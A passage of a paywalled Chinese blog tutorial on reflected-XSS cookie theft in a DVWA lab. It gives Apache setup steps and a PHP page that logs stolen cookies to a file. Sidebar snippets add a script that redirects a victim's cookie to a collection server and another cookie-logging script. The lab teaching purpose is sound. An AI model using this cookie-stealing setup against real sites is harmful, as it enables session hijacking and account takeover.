XSS ———— (二)利用反射型XSS窃取用户Cookie信息并利用

最新推荐文章于 2024-06-23 07:00:00 发布
最新推荐文章于 2024-06-23 07:00:00 发布
阅读量1.1k 收藏 2
点赞数
分类专栏: XSS攻击 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43102772/article/details/104504570
版权

思路:

  • 搭建能接收cookie的服务器
  • 构建带有XSS恶意代码的url
  • 发给用户诱导用户点击url
  • 获得用户cookie并利用

实验环境:
kali————充当攻击者接收cookie的服务器 192.168.0.53
DVWA————充当客户要访问的目标网站
centos7————充当用户客户端

小试牛刀:

一、搭建服务器

1. kali开启Apache服务
systemctl start apache2
2. 创建接收cookie的php页面
2.1 在/var/www/html下创建能接收cookie的php页面
vim test.php 内容如下

<?php
$cookie = $_GET['cookie'];	//获取cookie值
file_put_contents('cookie.txt',$cookie);	//将获取的cookie值写入到cookie.txt中
?>

2.2 创建能存储cookie的cookie.txt文本

touch cookie.txt

2.3 给test_xss.php和cookie.txt授权

#查看Apache用的什么权限
ps -aux | grep apache
# 授权
chown www-data:www-data test.php
chown www-data:www-data cookie.txt

在这里插入图片描述
至此我们就创建好了能接收cookie环境了。http://192.168.0.53/test_xss.php

二、制作XSS
  1. 构建XSS payload
<
最低0.47元/天 解锁文章
Benjiamin D
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
XSS之截获某用户cookie信息
l31299的博客
05-28 2849
XSS反射攻击方式实例
反射xsscookie(本地验证)
think_ycx的专栏
11-14 3181
原理反射xss 为危害之一就是:用户在登录的情况下点击了黑客发送的链接,就会导致该网址的cookie泄露,导致帐号被黑客登录。
4.XSS-反射(get)利用:获取cookie
最新发布
愿听风成曲
06-23 343
我这里将对应的IP地址修改为本地pikachu的主站IP地址,这样给用户造成一种正常视觉上的欺骗,容易上当。修改一下配置文件\pikachu\pkxss\xcookie\cookie.php。就能获取到用户的IP,cookie值,refer,ua等相关信息。输入基于域名的搭建的pkxss,在搜索框里输入链接。可以将referer的链接发送给对应的要攻击的用户。基于IP搭建的pkxss平台(入侵者的IP地址)在皮卡丘里面的xss后台进入cookie收集。我这里基于域名搭建的pkxss平台。
最简单的反射XSScookie
热门推荐
thislocal的博客
03-29 1万+
参考了网上的一堆教程和余弦的《web前端黑客技术揭秘》 主要是关于XSS的。更准确一点,关于盗取cookie的,且是反射。其实就是最简单的一个反射cookie盗取过程。 一、XSS的一般过程: 1、找到XSS漏洞,假设存在于网站A; 2、发送可以触发该漏洞的,特定代码到攻击目标; 可以这样构造:凤姐最新性感视频 其中,www.foo.com/xss/xss.php?x=是存在漏洞
bWAPP中利用反射xss获取cookie
****的博客
09-10 533
实验环境介绍 靶机:bWAPP bug类XSS - Reflected (GET) 难度级别:low 过程: 注:部分浏览器默认开启了XSS防御,关闭后才能实验成功。 测试靶机(图中的web server)是否存在XSS攻击。 URL地址:“http://192.168.248.174/dvwa/bWAPP/xss_get.php” 输入js代码 <script>alert(1...
反射xss钓鱼盗取用户cookie
m0_53820621的博客
01-16 4451
演示用靶场:dvwa
反射xss攻击代码.rar
05-14
反射跨站脚本攻击(Reflected Cross-Site Scripting,简称反射XSS)是一种常见的网络安全威胁,攻击者利用此类漏洞可以窃取用户的敏感信息,例如Cookie、Session ID等。Java作为一种广泛使用的后端开发语言,也...
XSS利用文档
05-23
反射XSS攻击是通过诱使用户点击含有恶意代码的链接来实现的。当用户访问这个链接时,恶意脚本会被立即执行。这种攻击的生命周期很短,因为脚本只在用户点击特定链接时执行一次。例如,攻击者可能会创建一个看似...
2021xx0326 袁卓霞反射XSS实验报告.docx
10-22
在本次实验中,袁卓霞同学通过一系列步骤深入理解和实践了反射XSS攻击,并展示了如何利用这种攻击手段获取用户Cookie信息。 首先,实验目的是让学生理解XSS攻击的概念、原理及其形成条件,以及攻击过程。为了...
Web应用安全:反射XSS.pptx
06-18
5. **信息窃取**:反射XSS常用于盗取用户Cookie信息,进而进行会话劫持或身份伪造。 **反射XSS漏洞条件** 1. **存在XSS漏洞**:目标网站必须存在未进行安全过滤或转码的用户输入点。 2. **恶意代码注入**...
pikachu靶场之反射XSScookie盗取)
weixin_45705209的博客
08-20 1949
反射XSS 尝试payload发现存在字符长度现在,使用F12查看元素,把maxlength属性改为足够长。使用最简单的payload:<script>alert('xss')</script>,出现弹窗,说明存在漏洞利用漏洞获取cookie实例操作 这里我们用的例子是post,get利用容易被受害者察觉,因为get只能在url中插入<script> document.location = 'http://127.0.0.1/pkxss/xcookie/coo
XSS入侵服务器盗取用户cookie
hughwupan的博客
03-28 1604
XSS入侵服务器盗取用户cookie欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导...
TOP16-XSS -- 小黑超细详解-+案例说明(盗取cookie登录)<宝藏文>
G_WEB_Xie的博客
04-03 1294
概念:通常指通过HTML注入篡改了网页,插入恶意脚本,从而在用户浏览网页时,控制用户浏览器的一种攻击。当入侵网站后,通过自己编定的脚本或者木马嵌入到网站页面,利用网站的流量将自己的网页木马传播出去从而达到自己的目的,当用户浏览网站的时候点击了编订的恶意程序脚本,从而达到获取用户信息,进行一系列未授权的操作。通俗理解:此漏洞主要以盗取用户信息, 获取用户的权限做一些越权操作,还可以结合其它漏洞进行一系列的攻击行为。
php反射xss,利用反射XSS漏洞,模拟获取登录账户的Cookie
weixin_39819152的博客
04-01 716
目录结构一、测试环境、测试目标三、原理描述四、操作步骤1.在服务器上搭建并启用hacker测试网站2.在服务器上测试站点根目录内创建一个存放攻击脚本的文件夹3.在xss文件夹下创建攻击脚本、cookie存储文件4.浏览器客户端向服务端提交特殊构造的XSS攻击脚本5.检查服务端获取到的cookie信息6.验证服务端获取到的cookie的有效性一、测试环境:PhpStudy+DVWA、测试目标:从...
跨站脚本攻击XSS 获取cookie (low)
weixin_44901204的博客
08-04 3629
XSS 跨站脚本攻击(Cross-site scripting),简称XSS(为区分CSS),它是一种迫使 Web 站点回显可执行代码的攻击技术。 XSS分为存储XSS(Stored XSS)和反射XSS(Reflected XSS) 存储XSS 思路: 黑客在服务器的某一个留言板上留言了一条可以执行的语句(这是一条命令),这条语句上有黑客的IP地址,普通用户去访问这个网站,一旦打开了留言板...
dvwa中 利用反射xss获取cookie进行会话的劫持演示
qq_35420342的博客
04-08 7606
首先打开dvwa,设置安全等级为low:输入&lt;script&gt;alert(11)&lt;/script&gt;证明弹窗:编写获取cookie的代码cookie.php,并将其放在一个web服务器上,这里我就放在http://127.0.0.1/dvwa/下面:构造如下URL,并发送给被攻击者:原始URL: http://location/dvwa/vulnerabilities/xss_...
xss盗取cookie原理剖析
weixin_51692662的博客
10-19 1829
xss盗取cookie
xss漏洞利用
weixin_33853794的博客
03-09 203
一、跨站获取cookie1,hacker端(hacker.php)的程序如下: <?php$cookie=$_GET['cookie'];$file=fopen("cookie.txt","a");fwrite($file,$cookie);fclose($file)?>2,受害者端(victim.php)的程序如下:<html><he...
DVWA中的反射XSS攻击实战解析
这种攻击能够利用用户的信任关系,诱导用户点击或访问含有恶意脚本的链接,从而执行攻击者预设的行为,如窃取用户Cookie信息。 在初级演示中,文档展示了如何在DVWA的Low安全级别下,通过在输入框中输入特定的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值